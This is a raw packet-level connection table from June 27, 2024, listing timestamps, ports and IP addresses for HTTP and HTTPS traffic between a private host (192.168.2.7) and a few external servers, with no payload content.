Jun 27, 2024 05:58:57.485646009 CEST	443	49745	67.199.248.11	192.168.2.7
Jun 27, 2024 05:58:57.486551046 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.486651897 CEST	49745	443	192.168.2.7	67.199.248.11
Jun 27, 2024 05:58:57.487236977 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.498754025 CEST	49745	443	192.168.2.7	67.199.248.11
Jun 27, 2024 05:58:57.498769999 CEST	443	49745	67.199.248.11	192.168.2.7
Jun 27, 2024 05:58:57.568023920 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.568051100 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.568062067 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.568089962 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.568110943 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.568137884 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.568195105 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.568229914 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.568253994 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.568264961 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.568276882 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.568285942 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.568315983 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.568480015 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.568496943 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.568521976 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.568536997 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.568555117 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.568567038 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.568578005 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.568588972 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.568598032 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.568608046 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.568614960 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.568634033 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.568660021 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.569103956 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.569114923 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.569124937 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.569134951 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.569143057 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.569153070 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.569164038 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.569171906 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.569181919 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.569192886 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.569200993 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.569211006 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.569217920 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.569227934 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.569240093 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.569247961 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.569257021 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.569267988 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.569276094 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.569287062 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.569339991 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.570034981 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.570050955 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.570061922 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.570074081 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.570084095 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.570090055 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.570103884 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.570110083 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.570118904 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.570131063 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.570149899 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.570190907 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.570190907 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.570347071 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.570357084 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.570368052 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.570379019 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.570385933 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.570395947 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.570405960 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.570414066 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.570425034 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.570450068 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.570873976 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.570884943 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.570895910 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.570905924 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.570915937 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.570924044 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.570935011 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.570950031 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.570957899 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.570969105 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.570975065 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.570985079 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.570991993 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.571002960 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.571013927 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.571023941 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.571032047 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.571041107 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.571053028 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.571062088 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.571085930 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.571752071 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.571763039 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.571773052 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.571784973 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.571791887 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.571801901 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.571809053 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.571820021 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.571830988 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.571837902 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.571847916 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.571856022 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.571871996 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.571882010 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.571907043 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.573075056 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.573126078 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.573144913 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.573156118 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.573190928 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.573260069 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.573271036 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.573282003 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.573292971 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.573309898 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.573323965 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.573385954 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.573424101 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.573488951 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.573499918 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.573508978 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.573527098 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.573534966 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.573545933 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.573551893 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.573563099 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.573571920 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.573580980 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.573590040 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.573606014 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.573631048 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.573954105 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.573964119 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.573975086 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.573987007 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.573993921 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.574023962 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.574135065 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.574146032 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.574157953 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.574167013 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.574172974 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.574203968 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.654311895 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.654331923 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.654342890 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.654405117 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.654405117 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.654428959 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.654439926 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.654450893 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.654478073 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.654489994 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.654588938 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.654628992 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.654706955 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.654716969 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.654727936 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.654738903 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.654747963 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.654756069 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.654774904 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.654792070 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.655153990 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.655164957 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.655174971 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.655185938 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.655196905 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.655205011 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.655214071 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.655225992 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.655236006 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.655244112 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.655253887 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.655261993 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.655270100 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.655277967 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.655296087 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.655311108 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.655823946 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.655834913 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.655844927 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.655870914 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.655879974 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.655889988 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.655900002 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.655906916 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.655919075 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.655926943 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.655953884 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.656286001 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.656296015 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.656306028 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.656326056 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.656352997 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.656358004 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.656450033 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.656465054 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.656474113 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.656507969 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.656625986 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.656636000 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.656646013 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.656656027 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.656670094 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.656697035 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.656951904 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.656963110 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.656972885 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.656982899 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.656991959 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.657001019 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.657011986 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.657027960 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.657032967 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.657054901 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.657073975 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.657413960 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.657423973 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.657433987 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.657444954 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.657459021 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.657464027 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.657474041 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.657499075 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.657519102 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.657929897 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.657939911 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.657951117 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.657960892 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.657967091 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.657978058 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.657988071 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.657994032 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.658004045 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.658015013 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.658025026 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.658031940 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.658041954 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.658049107 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.658058882 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.658072948 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.658077955 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.658077955 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.658088923 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.658099890 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.658106089 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.658129930 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.658148050 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.658896923 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.658907890 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.658916950 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.658926964 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.658937931 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.658947945 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.658957005 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.658965111 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.658976078 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.658984900 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.658992052 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.659001112 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.659012079 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.659024954 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.659030914 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.659039974 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.659048080 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.659065008 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.659086943 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.659887075 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.659898043 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.659908056 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.659919024 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.659929037 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.659939051 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.659945965 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.659955978 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.659966946 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.659974098 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.659982920 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.659993887 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.660003901 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.660011053 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.660024881 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.660031080 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.660038948 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.660047054 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.660057068 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.660073042 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.660099983 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.660783052 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.660794020 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.660803080 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.660814047 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.660825014 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.660835981 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.660841942 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.660852909 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.660864115 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.660875082 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.660881042 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.660895109 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.660898924 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.660907984 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.660916090 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.660926104 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.660937071 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.660944939 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.660968065 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.661596060 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.661607027 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.661617041 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.661627054 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.661653042 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.661679029 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.706803083 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:57.706873894 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:57.740617990 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.740648031 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.740694046 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.740715027 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.740737915 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.740750074 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.740789890 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.740884066 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.740895033 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.740906954 CEST	80	49742	94.228.166.74	192.168.2.7
